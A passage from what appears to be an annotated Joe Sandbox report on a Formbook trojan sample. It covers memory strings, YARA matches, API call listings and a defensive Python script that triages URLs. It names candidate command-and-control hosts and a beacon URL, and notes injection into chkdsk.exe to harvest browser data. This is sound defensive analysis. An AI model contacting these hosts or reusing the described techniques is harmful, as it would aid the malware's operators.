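        print(r["status"], r["headers"].get("server"), r["content_encoding"], r["body"])
```

Feed the nginx lines above to `decode_response` and the returned body is the 0x115-byte brotli stream with `content_encoding == "br"`; decompressing it is the one step left out here, because it needs a third-party brotli module.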
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zwervertjes.be
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zwervertjes.be/mcz6/
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkdsk.exe, 00000017.00000003.1751331021.0000000009963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: chkdsk.exe, 00000017.00000002.3766720594.00000000060E8000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003968000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP2
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
            Source: chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
            Source: chkdsk.exe, 00000017.00000002.3768491954.0000000007F10000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766720594.000000000722E000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003C8C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
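Most of the URLs above are noise: PowerShell module metadata (contoso.com, nuget.org, the Pester links), browser search-provider defaults and Microsoft sign-in URLs that turn up in chkdsk.exe memory while it harvests browser data, and a UPX string from Amcache. The entries that matter are www.zwervertjes.be/mcz6/ and www.allinone24.shop/mcz6/, the same URI path on two unrelated hosts, found in the dropped KAnMKAQhHABqpRuDRpLtww.exe and the injected chkdsk.exe. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it attributes each URL to the process dumps it was found in and flags paths that recur across hosts. The sample lines are copied from the report; the allowlist of benign hosts is an analyst assumption.

```python
"""Triage 'String found in binary or memory' URLs from a Joe Sandbox report:
per-process attribution plus a check for one URI path shared by several hosts.
Added example; not part of the Joe Sandbox report or its tooling."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

_LINE = re.compile(r"Source: (?P<src>.*?)String found in binary or memory: (?P<url>\S+)")

# Analyst allowlist (assumption): hosts that routinely appear in PowerShell module
# metadata, browser search-provider defaults and Windows sign-in code, not C2.
BENIGN_HOSTS = {"contoso.com", "nuget.org", "pesterbdd.com", "github.com",
                "www.apache.org", "schemas.xmlsoap.org", "aka.ms", "upx.sf.net",
                "login.live.com", "duckduckgo.com", "www.ecosia.org", "ac.ecosia.org",
                "cdn.ecosia.org", "ch.search.yahoo.com", "www.google.com"}


def parse(text):
    """List of (processes, url). The source field is 'proc.exe, <dump>.sdmp, ...';
    a source with no .exe token (e.g. Amcache.hve.17.dr) is kept as-is."""
    records = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue
        tokens = [t.strip() for t in m["src"].split(",")]
        procs = [t for t in tokens if t.lower().endswith(".exe")] or tokens[:1]
        records.append((procs, m["url"]))
    return records


def hosts_by_process(records):
    out = defaultdict(set)
    for procs, url in records:
        for p in procs:
            out[p].add(urlsplit(url).hostname)
    return out


def shared_paths(records, min_hosts=2):
    """URI paths (other than '' or '/') seen on at least `min_hosts` non-allowlisted hosts."""
    hosts = defaultdict(set)
    for _, url in records:
        u = urlsplit(url)
        if u.path not in ("", "/") and u.hostname not in BENIGN_HOSTS:
            hosts[u.path].add(u.hostname)
    return {path: sorted(h) for path, h in hosts.items() if len(h) >= min_hosts}


def triage(text):
    records = parse(text)
    seen = {urlsplit(u).hostname for _, u in records}
    return {"shared_paths": shared_paths(records),
            "hosts_by_process": hosts_by_process(records),
            "unlisted_hosts": sorted(seen - BENIGN_HOSTS)}


# Lines copied verbatim from the report above.
SAMPLE = r"""
Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zwervertjes.be
Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zwervertjes.be/mcz6/
Source: powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkdsk.exe, 00000017.00000002.3766720594.00000000060E8000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003968000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP2
Source: chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003C8C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
"""

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("shared paths:", result["shared_paths"])
    print("unlisted hosts:", result["unlisted_hosts"])
    for proc, hosts in sorted(result["hosts_by_process"].items()):
        print(proc, sorted(hosts))
```

The shared-path check is the useful signal here: a path like /mcz6/ reused on domains that have nothing to do with each other is what separates the sample's candidate C2 hosts from hosting-provider and 404-page URLs (fastmail.help, strato.de) that were merely pulled into memory by the responses.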

            E-Banking Fraud

            Source: Yara matchFile source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: Commandline size = 4239
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0042B113 NtClose,14_2_0042B113
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E35C0 NtCreateMutant,LdrInitializeThunk,14_2_053E35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_053E2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_053E2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2B60 NtClose,LdrInitializeThunk,14_2_053E2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E4650 NtSuspendThread,14_2_053E4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3010 NtOpenDirectoryObject,14_2_053E3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3090 NtSetValueKey,14_2_053E3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E4340 NtSetContextThread,14_2_053E4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2D30 NtUnmapViewOfSection,14_2_053E2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2D10 NtMapViewOfSection,14_2_053E2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3D10 NtOpenProcessToken,14_2_053E3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2D00 NtSetInformationFile,14_2_053E2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E3D70 NtOpenThread,14_2_053E3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2DB0 NtEnumerateKey,14_2_053E2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2DD0 NtDelayExecution,14_2_053E2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2C00 NtQueryInformationProcess,14_2_053E2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2C60 NtCreateKey,14_2_053E2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2CA0 NtQueryInformationToken,14_2_053E2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2CF0 NtOpenProcess,14_2_053E2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2CC0 NtQueryVirtualMemory,14_2_053E2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2F30 NtCreateSection,14_2_053E2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2F60 NtCreateProcessEx,14_2_053E2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2FB0 NtResumeThread,14_2_053E2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2FA0 NtQuerySection,14_2_053E2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2F90 NtProtectVirtualMemory,14_2_053E2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2FE0 NtCreateFile,14_2_053E2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2E30 NtWriteVirtualMemory,14_2_053E2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2EA0 NtAdjustPrivilegesToken,14_2_053E2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2E80 NtReadVirtualMemory,14_2_053E2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2EE0 NtQueueApcThread,14_2_053E2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E39B0 NtGetContextThread,14_2_053E39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2BA0 NtEnumerateValueKey,14_2_053E2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2B80 NtQueryInformationFile,14_2_053E2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2BF0 NtAllocateVirtualMemory,14_2_053E2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2BE0 NtQueryValueKey,14_2_053E2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2AB0 NtWaitForSingleObject,14_2_053E2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2AF0 NtWriteFile,14_2_053E2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2AD0 NtReadFile,14_2_053E2AD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054235C0 NtCreateMutant,LdrInitializeThunk,23_2_054235C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05424650 NtSuspendThread,LdrInitializeThunk,23_2_05424650
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05424340 NtSetContextThread,LdrInitializeThunk,23_2_05424340
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422D10 NtMapViewOfSection,LdrInitializeThunk,23_2_05422D10
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422D30 NtUnmapViewOfSection,LdrInitializeThunk,23_2_05422D30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422DD0 NtDelayExecution,LdrInitializeThunk,23_2_05422DD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422DF0 NtQuerySystemInformation,LdrInitializeThunk,23_2_05422DF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422C60 NtCreateKey,LdrInitializeThunk,23_2_05422C60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422C70 NtFreeVirtualMemory,LdrInitializeThunk,23_2_05422C70
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422CA0 NtQueryInformationToken,LdrInitializeThunk,23_2_05422CA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422F30 NtCreateSection,LdrInitializeThunk,23_2_05422F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422FE0 NtCreateFile,LdrInitializeThunk,23_2_05422FE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422FB0 NtResumeThread,LdrInitializeThunk,23_2_05422FB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422EE0 NtQueueApcThread,LdrInitializeThunk,23_2_05422EE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422E80 NtReadVirtualMemory,LdrInitializeThunk,23_2_05422E80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054239B0 NtGetContextThread,LdrInitializeThunk,23_2_054239B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422B60 NtClose,LdrInitializeThunk,23_2_05422B60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422BE0 NtQueryValueKey,LdrInitializeThunk,23_2_05422BE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422BF0 NtAllocateVirtualMemory,LdrInitializeThunk,23_2_05422BF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422BA0 NtEnumerateValueKey,LdrInitializeThunk,23_2_05422BA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422AD0 NtReadFile,LdrInitializeThunk,23_2_05422AD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422AF0 NtWriteFile,LdrInitializeThunk,23_2_05422AF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423010 NtOpenDirectoryObject,23_2_05423010
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423090 NtSetValueKey,23_2_05423090
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423D70 NtOpenThread,23_2_05423D70
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422D00 NtSetInformationFile,23_2_05422D00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423D10 NtOpenProcessToken,23_2_05423D10
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422DB0 NtEnumerateKey,23_2_05422DB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422C00 NtQueryInformationProcess,23_2_05422C00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422CC0 NtQueryVirtualMemory,23_2_05422CC0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422CF0 NtOpenProcess,23_2_05422CF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422F60 NtCreateProcessEx,23_2_05422F60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422F90 NtProtectVirtualMemory,23_2_05422F90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422FA0 NtQuerySection,23_2_05422FA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422E30 NtWriteVirtualMemory,23_2_05422E30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422EA0 NtAdjustPrivilegesToken,23_2_05422EA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422B80 NtQueryInformationFile,23_2_05422B80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422AB0 NtWaitForSingleObject,23_2_05422AB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777450 NtCreateFile,23_2_00777450
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_007775B0 NtReadFile,23_2_007775B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777690 NtDeleteFile,23_2_00777690
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777720 NtClose,23_2_00777720
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777880 NtAllocateVirtualMemory,23_2_00777880
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734106EA86_2_00007FF734106EA8
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F05546_2_00007FF7340F0554
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FC53C6_2_00007FF7340FC53C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F2D5C6_2_00007FF7340F2D5C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F5D9C6_2_00007FF7340F5D9C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F0D9C6_2_00007FF7340F0D9C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FE6006_2_00007FF7340FE600
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F36A06_2_00007FF7340F36A0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FBEBC6_2_00007FF7340FBEBC
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F4F046_2_00007FF7340F4F04
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F07586_2_00007FF7340F0758
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF73410680C6_2_00007FF73410680C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F28506_2_00007FF7340F2850
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7341031D86_2_00007FF7341031D8
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FBA286_2_00007FF7340FBA28
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734104A206_2_00007FF734104A20
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FD2AC6_2_00007FF7340FD2AC
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F12A86_2_00007FF7340F12A8
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F03506_2_00007FF7340F0350
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FFC586_2_00007FF7340FFC58
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734101CC86_2_00007FF734101CC8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DBCE039_2_00007FF887DBCE03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC5C109_2_00007FF887DC5C10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DBDBB39_2_00007FF887DBDBB3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC18A09_2_00007FF887DC18A0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC8FE99_2_00007FF887DC8FE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC5E829_2_00007FF887DC5E82
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC1E309_2_00007FF887DC1E30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC94719_2_00007FF887DC9471
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC19E09_2_00007FF887DC19E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887E831539_2_00007FF887E83153
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00401ABA14_2_00401ABA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040100014_2_00401000
